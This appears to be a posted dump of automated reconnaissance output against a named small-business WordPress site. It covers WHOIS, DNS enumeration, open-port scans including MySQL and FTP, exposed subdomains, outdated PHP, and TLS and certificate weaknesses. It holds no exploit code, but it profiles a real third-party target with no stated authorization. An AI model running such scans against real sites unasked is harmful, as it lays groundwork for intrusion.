· 6 years ago · Jan 05, 2020, 09:31 AM
1####################################################################################################################################
2=====================================================================================================================================
3Hostname www.cazahispanica.com ISP 1&1 Ionos Se
4Continent Europe Flag
5DE
6Country Germany Country Code DE
7Region Unknown Local time 05 Jan 2020 09:05 CET
8City Unknown Postal Code Unknown
9IP Address 217.160.131.142 Latitude 51.299
10======================================================================================================================================
11######################################################################################################################################
12> www.cazahispanica.com
13Server: 38.132.106.139
14Address: 38.132.106.139#53
15
16Non-authoritative answer:
17Name: www.cazahispanica.com
18Address: 217.160.131.142
19>
20####################################################################################################################################
21 Domain Name: CAZAHISPANICA.COM
22 Registry Domain ID: 258094625_DOMAIN_COM-VRSN
23 Registrar WHOIS Server: whois.nicline.com
24 Registrar URL: http://www.nicline.com
25 Updated Date: 2019-11-17T08:16:47Z
26 Creation Date: 2005-11-16T11:19:01Z
27 Registry Expiry Date: 2020-11-16T11:19:01Z
28 Registrar: Arsys Internet, S.L. dba NICLINE.COM
29 Registrar IANA ID: 379
30 Registrar Abuse Contact Email:
31 Registrar Abuse Contact Phone:
32 Domain Status: ok https://icann.org/epp#ok
33 Name Server: DNS47.SERVIDORESDNS.NET
34 Name Server: DNS48.SERVIDORESDNS.NET
35 DNSSEC: unsigned
36###################################################################################################################################
37[+] Target : www.cazahispanica.com
38
39[+] IP Address : 217.160.131.142
40
41[+] Headers :
42
43[+] Date : Sun, 05 Jan 2020 08:17:15 GMT
44[+] Server : Apache
45[+] X-Powered-By : PHP/5.6.40, PleskLin
46[+] Expires : Thu, 19 Nov 1981 08:52:00 GMT
47[+] Cache-Control : no-store, no-cache, must-revalidate, post-check=0, pre-check=0
48[+] Pragma : no-cache
49[+] Link : <http://www.cazahispanica.com/wp-json/>; rel="https://api.w.org/", <http://www.cazahispanica.com/>; rel=shortlink
50[+] Set-Cookie : PHPSESSID=gj9unfg4d25cf4l6c3kmk8c8c5; path=/
51[+] Connection : close
52[+] Transfer-Encoding : chunked
53[+] Content-Type : text/html; charset=UTF-8
54
55[+] SSL Certificate Information :
56
57[-] SSL is not Present on Target URL...Skipping...
58
59[+] Whois Lookup :
60
61[+] NIR : None
62[+] ASN Registry : ripencc
63[+] ASN : 8560
64[+] ASN CIDR : 217.160.0.0/16
65[+] ASN Country Code : DE
66[+] ASN Date : 2001-03-07
67[+] ASN Description : ONEANDONE-AS Brauerstrasse 48, DE
68[+] cidr : 217.160.131.0/24
69[+] name : SCHLUND-CUSTOMERS
70[+] handle : IPAD-RIPE
71[+] range : 217.160.131.0 - 217.160.131.255
72[+] description : 1&1 Internet AG
73[+] country : ES
74[+] state : None
75[+] city : None
76[+] address : Brauerstrae 48
7776135
78Karlsruhe
79GERMANY
80[+] postal_code : None
81[+] emails : ['abuse@oneandone.net']
82[+] created : 2014-12-01T14:36:24Z
83[+] updated : 2014-12-01T14:36:24Z
84
85[+] Crawling Target...
86
87[+] Looking for robots.txt........[ Found ]
88[+] Extracting robots Links.......[ 2 ]
89[+] Looking for sitemap.xml.......[ Found ]
90[+] Extracting sitemap Links......[ 156 ]
91[+] Extracting CSS Links..........[ 13 ]
92[+] Extracting Javascript Links...[ 19 ]
93[+] Extracting Internal Links.....[ 30 ]
94[+] Extracting External Links.....[ 4 ]
95[+] Extracting Images.............[ 10 ]
96
97[+] Total Links Extracted : 204
98
99[+] Dumping Links in /opt/FinalRecon/dumps/www.cazahispanica.com.dump
100[+] Completed!
101####################################################################################################################################
102[i] Scanning Site: http://www.cazahispanica.com
103
104
105
106B A S I C I N F O
107====================
108
109
110[+] Site Title: Caza Hispanica | Your hunting company in Spain
111[+] IP address: 217.160.131.142
112[+] Web Server: Apache
113[+] CMS: WordPress
114[+] Cloudflare: Not Detected
115[+] Robots File: Found
116
117-------------[ contents ]----------------
118User-agent: *
119Disallow: /wp-admin/
120Allow: /wp-admin/admin-ajax.php
121
122-----------[end of contents]-------------
123
124
125
126W H O I S L O O K U P
127========================
128
129 Domain Name: CAZAHISPANICA.COM
130 Registry Domain ID: 258094625_DOMAIN_COM-VRSN
131 Registrar WHOIS Server: whois.nicline.com
132 Registrar URL: http://www.nicline.com
133 Updated Date: 2019-11-17T08:16:47Z
134 Creation Date: 2005-11-16T11:19:01Z
135 Registry Expiry Date: 2020-11-16T11:19:01Z
136 Registrar: Arsys Internet, S.L. dba NICLINE.COM
137 Registrar IANA ID: 379
138 Registrar Abuse Contact Email:
139 Registrar Abuse Contact Phone:
140 Domain Status: ok https://icann.org/epp#ok
141 Name Server: DNS47.SERVIDORESDNS.NET
142 Name Server: DNS48.SERVIDORESDNS.NET
143 DNSSEC: unsigned
144 URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
145>>> Last update of whois database: 2020-01-05T08:17:28Z <<<
146
147For more information on Whois status codes, please visit https://icann.org/epp
148
149
150
151The Registry database contains ONLY .COM, .NET, .EDU domains and
152Registrars.
153
154
155
156
157G E O I P L O O K U P
158=========================
159
160[i] IP Address: 217.160.131.142
161[i] Country: Germany
162[i] State:
163[i] City:
164[i] Latitude: 51.2993
165[i] Longitude: 9.491
166
167
168
169
170H T T P H E A D E R S
171=======================
172
173
174[i] HTTP/1.1 200 OK
175[i] Date: Sun, 05 Jan 2020 08:17:37 GMT
176[i] Server: Apache
177[i] X-Powered-By: PHP/5.6.40
178[i] Expires: Thu, 19 Nov 1981 08:52:00 GMT
179[i] Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
180[i] Pragma: no-cache
181[i] Link: <http://www.cazahispanica.com/wp-json/>; rel="https://api.w.org/", <http://www.cazahispanica.com/>; rel=shortlink
182[i] Set-Cookie: PHPSESSID=mbia876n8vm2tkkpih84fpd7q0; path=/
183[i] X-Powered-By: PleskLin
184[i] Connection: close
185[i] Content-Type: text/html; charset=UTF-8
186
187
188
189
190D N S L O O K U P
191===================
192
193cazahispanica.com. 3599 IN SOA dns47.servidoresdns.net. hostmaster.servidoresdns.net. 2019080615 21600 3600 2419200 60
194cazahispanica.com. 3599 IN NS dns47.servidoresdns.net.
195cazahispanica.com. 3599 IN NS dns48.servidoresdns.net.
196cazahispanica.com. 3599 IN A 217.160.131.142
197cazahispanica.com. 3599 IN MX 10 mx.serviciodecorreo.es.
198cazahispanica.com. 3599 IN TXT "v=spf1 include:_spf.serviciodecorreo.es ~all"
199
200
201
202
203S U B N E T C A L C U L A T I O N
204====================================
205
206Address = 217.160.131.142
207Network = 217.160.131.142 / 32
208Netmask = 255.255.255.255
209Broadcast = not needed on Point-to-Point links
210Wildcard Mask = 0.0.0.0
211Hosts Bits = 0
212Max. Hosts = 1 (2^0 - 0)
213Host Range = { 217.160.131.142 - 217.160.131.142 }
214
215
216
217N M A P P O R T S C A N
218============================
219
220Starting Nmap 7.70 ( https://nmap.org ) at 2020-01-05 08:17 UTC
221Nmap scan report for cazahispanica.com (217.160.131.142)
222Host is up (0.088s latency).
223rDNS record for 217.160.131.142: s18161039.onlinehome-server.info
224
225PORT STATE SERVICE
22621/tcp open ftp
22722/tcp open ssh
22823/tcp closed telnet
22980/tcp open http
230110/tcp closed pop3
231143/tcp closed imap
232443/tcp open https
2333389/tcp closed ms-wbt-server
234
235Nmap done: 1 IP address (1 host up) scanned in 0.41 seconds
236
237
238
239S U B - D O M A I N F I N D E R
240==================================
241
242
243[i] Total Subdomains Found : 1
244
245[+] Subdomain: www.cazahispanica.com
246[-] IP: 217.160.131.142
247
248####################################################################################################################################
249[+] Starting At 2020-01-05 03:17:33.725336
250[+] Collecting Information On: http://www.cazahispanica.com/
251[#] Status: 200
252--------------------------------------------------
253[#] Web Server Detected: Apache
254[#] X-Powered-By: PHP/5.6.40, PleskLin
255[!] X-Frame-Options Headers not detect! target might be vulnerable Click Jacking
256- Date: Sun, 05 Jan 2020 08:17:31 GMT
257- Server: Apache
258- X-Powered-By: PHP/5.6.40, PleskLin
259- Expires: Thu, 19 Nov 1981 08:52:00 GMT
260- Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
261- Pragma: no-cache
262- Link: <http://www.cazahispanica.com/wp-json/>; rel="https://api.w.org/", <http://www.cazahispanica.com/>; rel=shortlink
263- Set-Cookie: PHPSESSID=s2vct4h1ato3cactlf4a75dkg0; path=/
264- Connection: close
265- Transfer-Encoding: chunked
266- Content-Type: text/html; charset=UTF-8
267--------------------------------------------------
268[#] Finding Location..!
269[#] status: success
270[#] country: Germany
271[#] countryCode: DE
272[#] region: BW
273[#] regionName: Baden-Württemberg
274[#] city: Karlsruhe
275[#] zip: 76139
276[#] lat: 48.9997
277[#] lon: 8.38573
278[#] timezone: Europe/Berlin
279[#] isp: SCHLUND
280[#] org: 1&1 Internet SE
281[#] as: AS8560 1&1 Internet SE
282[#] query: 217.160.131.142
283--------------------------------------------------
284[x] Didn't Detect WAF Presence on: http://www.cazahispanica.com/
285--------------------------------------------------
286[#] Starting Reverse DNS
287[-] Failed ! Fail
288--------------------------------------------------
289[!] Scanning Open Port
290[#] 21/tcp open ftp
291[#] 22/tcp open ssh
292[#] 80/tcp open http
293[#] 443/tcp open https
294[#] 3306/tcp open mysql
295[#] 8443/tcp open https-alt
296--------------------------------------------------
297[+] Getting SSL Info
298[SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed: self signed certificate (_ssl.c:1076)
299--------------------------------------------------
300[+] Collecting Information Disclosure!
301[#] Detecting sitemap.xml file
302[!] sitemap.xml File Found: http://www.cazahispanica.com//sitemap.xml
303[#] Detecting robots.txt file
304[!] robots.txt File Found: http://www.cazahispanica.com//robots.txt
305[#] Detecting GNU Mailman
306[-] GNU Mailman App Not Detected!?
307--------------------------------------------------
308[+] Crawling Url Parameter On: http://www.cazahispanica.com/
309--------------------------------------------------
310[#] Searching Html Form !
311[-] No Html Form Found!?
312--------------------------------------------------
313[!] Found 3 dom parameter
314[#] http://www.cazahispanica.com//#mobile-menu
315[#] http://www.cazahispanica.com//#nextSection
316[#] http://www.cazahispanica.com//#top
317--------------------------------------------------
318[!] 1 Internal Dynamic Parameter Discovered
319[+] http://www.cazahispanica.com/xmlrpc.php?rsd
320--------------------------------------------------
321[-] No external Dynamic Paramter Found!?
322--------------------------------------------------
323[!] 74 Internal links Discovered
324[+] http://www.cazahispanica.com/xmlrpc.php
325[+] http://www.cazahispanica.com/wp-content/uploads/2015/07/favicon.jpg
326[+] http://www.cazahispanica.com/
327[+] http://www.cazahispanica.com/feed/
328[+] http://www.cazahispanica.com/comments/feed/
329[+] http://www.cazahispanica.com/wp-includes/wlwmanifest.xml
330[+] http://www.cazahispanica.com/wp-content/plugins/js_composer/assets/css/vc-ie8.css
331[+] http://www.cazahispanica.com/wp-content/uploads/2015/09/cropped-logo-square-32x32.jpg
332[+] http://www.cazahispanica.com/wp-content/uploads/2015/09/cropped-logo-square-192x192.jpg
333[+] http://www.cazahispanica.com/wp-content/uploads/2015/09/cropped-logo-square-180x180.jpg
334[+] http://www.cazahispanica.com//mailto:info@cazahispanica.com
335[+] http://www.cazahispanica.com/
336[+] http://www.cazahispanica.com/
337[+] http://www.cazahispanica.com/about-us/
338[+] http://www.cazahispanica.com/about-us/
339[+] http://www.cazahispanica.com/about-us/media/
340[+] http://www.cazahispanica.com/about-us/conventions/
341[+] http://www.cazahispanica.com/hunting/
342[+] http://www.cazahispanica.com/hunting/species/
343[+] http://www.cazahispanica.com/hunting/species/spanish-ibex/
344[+] http://www.cazahispanica.com/hunting/species/deer/
345[+] http://www.cazahispanica.com/hunting/species/chamois-2/
346[+] http://www.cazahispanica.com/hunting/species/wild-sheep/
347[+] http://www.cazahispanica.com/hunting/species/balearean-goat-2/
348[+] http://www.cazahispanica.com/hunting/species/wild-boar/
349[+] http://www.cazahispanica.com/hunting/species/spanish-wolf/
350[+] http://www.cazahispanica.com/hunting/species/red-legged-partridge/
351[+] http://www.cazahispanica.com/hunting/hunting-experience/
352[+] http://www.cazahispanica.com/hunting/hunting-experience/transport-and-company/
353[+] http://www.cazahispanica.com/hunting/hunting-experience/hosting-and-accommodation/
354[+] http://www.cazahispanica.com/hunting/hunting-experience/meals-and-boards/
355[+] http://www.cazahispanica.com/hunting/hunting-experience/the-hunt/
356[+] http://www.cazahispanica.com/hunting/hunting-experience/documents/
357[+] http://www.cazahispanica.com/hunting/hunting-experience/taxidermy/
358[+] http://www.cazahispanica.com/hunting/hunting-experience/hunt-in-spain-getting-ready/
359[+] http://www.cazahispanica.com/hunting/hunting-experience/photos-hunting-in-spain/
360[+] http://www.cazahispanica.com/hunting/hunting-experience/hunting-in-spain-video-collection/
361[+] http://www.cazahispanica.com/hunting/tourism-and-sightseeing/
362[+] http://www.cazahispanica.com/hunting/spain-hunting-packages/
363[+] http://www.cazahispanica.com/testimonials/
364[+] http://www.cazahispanica.com/blog/
365[+] http://www.cazahispanica.com/faq/
366[+] http://www.cazahispanica.com/contact-us/
367[+] http://www.cazahispanica.com/
368[+] http://www.cazahispanica.com/about-us/
369[+] http://www.cazahispanica.com/about-us/
370[+] http://www.cazahispanica.com/about-us/media/
371[+] http://www.cazahispanica.com/about-us/conventions/
372[+] http://www.cazahispanica.com/hunting/
373[+] http://www.cazahispanica.com/hunting/species/
374[+] http://www.cazahispanica.com/hunting/species/spanish-ibex/
375[+] http://www.cazahispanica.com/hunting/species/deer/
376[+] http://www.cazahispanica.com/hunting/species/chamois-2/
377[+] http://www.cazahispanica.com/hunting/species/wild-sheep/
378[+] http://www.cazahispanica.com/hunting/species/balearean-goat-2/
379[+] http://www.cazahispanica.com/hunting/species/wild-boar/
380[+] http://www.cazahispanica.com/hunting/species/spanish-wolf/
381[+] http://www.cazahispanica.com/hunting/species/red-legged-partridge/
382[+] http://www.cazahispanica.com/hunting/hunting-experience/
383[+] http://www.cazahispanica.com/hunting/hunting-experience/transport-and-company/
384[+] http://www.cazahispanica.com/hunting/hunting-experience/hosting-and-accommodation/
385[+] http://www.cazahispanica.com/hunting/hunting-experience/meals-and-boards/
386[+] http://www.cazahispanica.com/hunting/hunting-experience/the-hunt/
387[+] http://www.cazahispanica.com/hunting/hunting-experience/documents/
388[+] http://www.cazahispanica.com/hunting/hunting-experience/taxidermy/
389[+] http://www.cazahispanica.com/hunting/hunting-experience/hunt-in-spain-getting-ready/
390[+] http://www.cazahispanica.com/hunting/hunting-experience/photos-hunting-in-spain/
391[+] http://www.cazahispanica.com/hunting/hunting-experience/hunting-in-spain-video-collection/
392[+] http://www.cazahispanica.com/hunting/tourism-and-sightseeing/
393[+] http://www.cazahispanica.com/hunting/spain-hunting-packages/
394[+] http://www.cazahispanica.com/testimonials/
395[+] http://www.cazahispanica.com/blog/
396[+] http://www.cazahispanica.com/faq/
397[+] http://www.cazahispanica.com/contact-us/
398--------------------------------------------------
399[!] 6 External links Discovered
400[#] http://gmpg.org/xfn/11
401[#] https://plus.google.com/+Cazahispanica
402[#] https://twitter.com/cazahispanica
403[#] https://www.facebook.com/CazaHispanica
404[#] https://instagram.com/cazahispanica/
405[#] https://plus.google.com/u/0/109493036396885801729/videos
406--------------------------------------------------
407[#] Mapping Subdomain..
408[!] Found 2 Subdomain
409- cazahispanica.com
410- www.cazahispanica.com
411--------------------------------------------------
412[!] Done At 2020-01-05 03:17:50.093861
413####################################################################################################################################
414Trying "cazahispanica.com"
415;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 48420
416;; flags: qr rd ra; QUERY: 1, ANSWER: 6, AUTHORITY: 0, ADDITIONAL: 0
417
418;; QUESTION SECTION:
419;cazahispanica.com. IN ANY
420
421;; ANSWER SECTION:
422cazahispanica.com. 3600 IN TXT "v=spf1 include:_spf.serviciodecorreo.es ~all"
423cazahispanica.com. 3600 IN MX 10 mx.serviciodecorreo.es.
424cazahispanica.com. 3600 IN A 217.160.131.142
425cazahispanica.com. 3600 IN SOA dns47.servidoresdns.net. hostmaster.servidoresdns.net. 2019080615 21600 3600 2419200 60
426cazahispanica.com. 3600 IN NS dns47.servidoresdns.net.
427cazahispanica.com. 3600 IN NS dns48.servidoresdns.net.
428
429Received 250 bytes from 2001:18c0:121:6900:724f:b8ff:fefd:5b6a#53 in 1105 ms
430###################################################################################################################################
431; <<>> DiG 9.11.5-P4-5.1+b1-Debian <<>> +trace cazahispanica.com any
432;; global options: +cmd
433. 82367 IN NS m.root-servers.net.
434. 82367 IN NS b.root-servers.net.
435. 82367 IN NS k.root-servers.net.
436. 82367 IN NS d.root-servers.net.
437. 82367 IN NS c.root-servers.net.
438. 82367 IN NS h.root-servers.net.
439. 82367 IN NS j.root-servers.net.
440. 82367 IN NS g.root-servers.net.
441. 82367 IN NS e.root-servers.net.
442. 82367 IN NS a.root-servers.net.
443. 82367 IN NS i.root-servers.net.
444. 82367 IN NS l.root-servers.net.
445. 82367 IN NS f.root-servers.net.
446. 82367 IN RRSIG NS 8 0 518400 20200118050000 20200105040000 33853 . Nn0bwlOg0mqVWK/VSoy621bvZslLQvCC999BxdDmeM0lgXq4Vpg72SEs GhiyhZE1EoqmN3x39VoFanZf2TS4wMHLzBopbMysKU0yeHGE0taA4gAP j0Fuk6cWtU7vSzW+AfpSCPd80mw3tHLE6oFVAKz9Ta0DUa0bOL0nU80j pWB8OJy9ULi+lbN6JdvB4+yf/V9LagMnrjNz2UwkQkpq4dqE0hohA4Pk 54MXrBMJDf0zm7EPe9FDpuN+Y8vFzcb+nPAfyjI/Qw0Jp65fpOI2v07b JK6EytckXC0svQ5toNx9xL2c/YgvAgsyEzml2QmzFSOia2IIXvjIaVjg qM6ChQ==
447;; Received 525 bytes from 38.132.106.139#53(38.132.106.139) in 89 ms
448
449com. 172800 IN NS a.gtld-servers.net.
450com. 172800 IN NS b.gtld-servers.net.
451com. 172800 IN NS c.gtld-servers.net.
452com. 172800 IN NS d.gtld-servers.net.
453com. 172800 IN NS e.gtld-servers.net.
454com. 172800 IN NS f.gtld-servers.net.
455com. 172800 IN NS g.gtld-servers.net.
456com. 172800 IN NS h.gtld-servers.net.
457com. 172800 IN NS i.gtld-servers.net.
458com. 172800 IN NS j.gtld-servers.net.
459com. 172800 IN NS k.gtld-servers.net.
460com. 172800 IN NS l.gtld-servers.net.
461com. 172800 IN NS m.gtld-servers.net.
462com. 86400 IN DS 30909 8 2 E2D3C916F6DEEAC73294E8268FB5885044A833FC5459588F4A9184CF C41A5766
463com. 86400 IN RRSIG DS 8 1 86400 20200118050000 20200105040000 33853 . pDeVpg9ulG0/ivfb/0oPKZNM6YfafynojTbFTmFhZpoMZB/6Xz0CU47W aaS8jPyDeItlVf+4ZE2rG/VneNyESNdrCyyT4/EMhlrQmWqc4GtUZOD5 7PdKVv+MszIxv0Dr7mZBElOdc4DFcfROtX+0iB4W3qTCKrL2ffBWZj+a Q2J1+4uR5BG0OgvYl00EXu1K3DqsM7LDGDTucgiNF8IMb5N5aVM/Lzlt /gubOXe1fII4la+b6dH1vgD5Lhw8N9z0j1dmbFa4WxNGkFILl/RzFKvW NmKKlQ8n89Q2uOVhyn3ypQf52jWZbhpXNycfjSaLrTuJuHDAvwYj3eej 88Q5Dg==
464;; Received 1177 bytes from 192.203.230.10#53(e.root-servers.net) in 121 ms
465
466cazahispanica.com. 172800 IN NS dns47.servidoresdns.net.
467cazahispanica.com. 172800 IN NS dns48.servidoresdns.net.
468CK0POJMG874LJREF7EFN8430QVIT8BSM.com. 86400 IN NSEC3 1 1 0 - CK0Q1GIN43N1ARRC9OSM6QPQR81H5M9A NS SOA RRSIG DNSKEY NSEC3PARAM
469CK0POJMG874LJREF7EFN8430QVIT8BSM.com. 86400 IN RRSIG NSEC3 8 2 86400 20200110054859 20200103043859 12163 com. TZL8iABz5guy+B98SxKG/exgyrO9nkukTXPhUXGBiKNPRWPJpQtqFO0J s94yfFzxCpPVDQxNyQvU69jPN8jOx+lwfjIxR+e0bpvSbndnYwo4pQrb u0s6Bd1M3tjN455ZdxYEWD0RzJyrLOYKqJJUmAZ9eVfMzKPiuexhdth2 ZoIrtwHcpVwwPBHj+62L1eTzCgftxIxsi+ayVbVPBQjvlw==
470NIMQ041U2K33GE3AD744GSUSAFFKF83M.com. 86400 IN NSEC3 1 1 0 - NIMR1TUNJSLTFN9QR13ME7THD9JMSNAE NS DS RRSIG
471NIMQ041U2K33GE3AD744GSUSAFFKF83M.com. 86400 IN RRSIG NSEC3 8 2 86400 20200109071636 20200102060636 12163 com. XZry2M0PmpYY6klGSOYwq0rxJPwKyqZe0kB2HswpjCR2LE4mlWR6TRqB AvHNRWUvqO7tXO5AqYP8CGycm56t7Kh1CIDt+P9AKMDqMpwTmsAFqTSc IZL+x+ALPLY9/lnYvKHRCXDcsjCWcYOBCoBXDdqYZlqw7mOZL8pQg+d/ wE9N0KhrsI0p3g4W73djgDkTo+8BPlP7dlazhQuJsWbZCg==
472;; Received 652 bytes from 192.52.178.30#53(k.gtld-servers.net) in 120 ms
473
474cazahispanica.com. 3600 IN SOA dns47.servidoresdns.net. hostmaster.servidoresdns.net. 2019080615 21600 3600 2419200 60
475cazahispanica.com. 3600 IN NS dns48.servidoresdns.net.
476cazahispanica.com. 3600 IN NS dns47.servidoresdns.net.
477cazahispanica.com. 3600 IN A 217.160.131.142
478cazahispanica.com. 3600 IN MX 10 mx.serviciodecorreo.es.
479cazahispanica.com. 3600 IN TXT "v=spf1 include:_spf.serviciodecorreo.es ~all"
480;; Received 289 bytes from 217.76.128.164#53(dns47.servidoresdns.net) in 198 ms
481
482###################################################################################################################################
483[*] Performing General Enumeration of Domain: cazahispanica.com
484[-] DNSSEC is not configured for cazahispanica.com
485[*] SOA dns47.servidoresdns.net 217.76.128.164
486[*] NS dns47.servidoresdns.net 217.76.128.164
487[*] NS dns48.servidoresdns.net 82.223.218.164
488[*] MX mx.serviciodecorreo.es 82.223.190.100
489[*] A cazahispanica.com 217.160.131.142
490[*] TXT cazahispanica.com v=spf1 include:_spf.serviciodecorreo.es ~all
491[*] Enumerating SRV Records
492[-] No SRV Records Found for cazahispanica.com
493[+] 0 Records Found
494###################################################################################################################################
495[*] Processing domain cazahispanica.com
496[*] Using system resolvers ['38.132.106.139', '194.187.251.67', '185.93.180.131', '2001:18c0:121:6900:724f:b8ff:fefd:5b6a', '192.168.0.1']
497[+] Getting nameservers
498217.76.128.164 - dns47.servidoresdns.net
49982.223.218.164 - dns48.servidoresdns.net
500[-] Zone transfer failed
501
502[+] TXT records found
503"v=spf1 include:_spf.serviciodecorreo.es ~all"
504
505[+] MX records found, added to target list
50610 mx.serviciodecorreo.es.
507
508[*] Scanning cazahispanica.com for A records
509217.160.131.142 - cazahispanica.com
51082.223.190.241 - autoconfig.cazahispanica.com
51182.223.190.241 - autodiscover.cazahispanica.com
512217.76.128.55 - control.cazahispanica.com
51382.223.190.234 - webmail.cazahispanica.com
514217.160.131.142 - www.cazahispanica.com
515###################################################################################################################################
516 AVAILABLE PLUGINS
517 -----------------
518
519 RobotPlugin
520 EarlyDataPlugin
521 CertificateInfoPlugin
522 OpenSslCcsInjectionPlugin
523 SessionResumptionPlugin
524 SessionRenegotiationPlugin
525 HeartbleedPlugin
526 CompressionPlugin
527 FallbackScsvPlugin
528 OpenSslCipherSuitesPlugin
529 HttpHeadersPlugin
530
531
532
533 CHECKING HOST(S) AVAILABILITY
534 -----------------------------
535
536 217.160.131.142:443 => 217.160.131.142
537
538
539
540
541 SCAN RESULTS FOR 217.160.131.142:443 - 217.160.131.142
542 ------------------------------------------------------
543
544 * SSLV3 Cipher Suites:
545 Server rejected all cipher suites.
546
547 * OpenSSL CCS Injection:
548 OK - Not vulnerable to OpenSSL CCS injection
549
550 * SSLV2 Cipher Suites:
551 Server rejected all cipher suites.
552
553 * TLSV1_1 Cipher Suites:
554 Forward Secrecy OK - Supported
555 RC4 OK - Not Supported
556
557 Preferred:
558 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
559 Accepted:
560 TLS_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
561 TLS_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 200 OK
562 TLS_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
563 TLS_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
564 TLS_RSA_WITH_3DES_EDE_CBC_SHA 112 bits HTTP 200 OK
565 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
566 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
567 TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA 112 bits HTTP 200 OK
568 TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
569 TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 200 OK
570 TLS_DHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
571 TLS_DHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
572 TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA 112 bits HTTP 200 OK
573
574 * TLSV1 Cipher Suites:
575 Forward Secrecy OK - Supported
576 RC4 OK - Not Supported
577
578 Preferred:
579 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
580 Accepted:
581 TLS_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
582 TLS_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 200 OK
583 TLS_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
584 TLS_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
585 TLS_RSA_WITH_3DES_EDE_CBC_SHA 112 bits HTTP 200 OK
586 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
587 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
588 TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA 112 bits HTTP 200 OK
589 TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
590 TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 200 OK
591 TLS_DHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
592 TLS_DHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
593 TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA 112 bits HTTP 200 OK
594
595 * Certificate Information:
596 Content
597 SHA1 Fingerprint: 99071423593dfbd332ec7db7e8fdb0b955813476
598 Common Name: Parallels Panel
599 Issuer: Parallels Panel
600 Serial Number: 1422356774
601 Not Before: 2015-01-27 11:06:14
602 Not After: 2016-01-27 11:06:14
603 Signature Algorithm: sha1
604 Public Key Algorithm: RSA
605 Key Size: 2048
606 Exponent: 65537 (0x10001)
607 DNS Subject Alternative Names: []
608
609 Trust
610 Hostname Validation: FAILED - Certificate does NOT match 217.160.131.142
611 Android CA Store (9.0.0_r9): FAILED - Certificate is NOT Trusted: self signed certificate
612 Apple CA Store (iOS 12, macOS 10.14, watchOS 5, and tvOS 12):FAILED - Certificate is NOT Trusted: self signed certificate
613 Java CA Store (jdk-12.0.1): FAILED - Certificate is NOT Trusted: self signed certificate
614 Mozilla CA Store (2019-03-14): FAILED - Certificate is NOT Trusted: self signed certificate
615 Windows CA Store (2019-05-27): FAILED - Certificate is NOT Trusted: self signed certificate
616 Symantec 2018 Deprecation: OK - Not a Symantec-issued certificate
617 Received Chain: Parallels Panel
618 Verified Chain: ERROR - Could not build verified chain (certificate untrusted?)
619 Received Chain Contains Anchor: ERROR - Could not build verified chain (certificate untrusted?)
620 Received Chain Order: OK - Order is valid
621 Verified Chain contains SHA1: ERROR - Could not build verified chain (certificate untrusted?)
622
623 Extensions
624 OCSP Must-Staple: NOT SUPPORTED - Extension not found
625 Certificate Transparency: NOT SUPPORTED - Extension not found
626
627 OCSP Stapling
628 NOT SUPPORTED - Server did not send back an OCSP response
629
630 * Deflate Compression:
631 OK - Compression disabled
632
633 * TLS 1.2 Session Resumption Support:
634 With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
635 With TLS Tickets: OK - Supported
636
637 * OpenSSL Heartbleed:
638 OK - Not vulnerable to Heartbleed
639
640 * TLSV1_3 Cipher Suites:
641 Server rejected all cipher suites.
642
643 * Session Renegotiation:
644 Client-initiated Renegotiation: OK - Rejected
645 Secure Renegotiation: OK - Supported
646
647 * Downgrade Attacks:
648 TLS_FALLBACK_SCSV: OK - Supported
649
650 * TLSV1_2 Cipher Suites:
651 Forward Secrecy OK - Supported
652 RC4 OK - Not Supported
653
654 Preferred:
655 TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 256 bits HTTP 200 OK
656 Accepted:
657 TLS_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
658 TLS_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 200 OK
659 TLS_RSA_WITH_AES_256_GCM_SHA384 256 bits HTTP 200 OK
660 TLS_RSA_WITH_AES_256_CBC_SHA256 256 bits HTTP 200 OK
661 TLS_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
662 TLS_RSA_WITH_AES_128_GCM_SHA256 128 bits HTTP 200 OK
663 TLS_RSA_WITH_AES_128_CBC_SHA256 128 bits HTTP 200 OK
664 TLS_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
665 TLS_RSA_WITH_3DES_EDE_CBC_SHA 112 bits HTTP 200 OK
666 TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 256 bits HTTP 200 OK
667 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 256 bits HTTP 200 OK
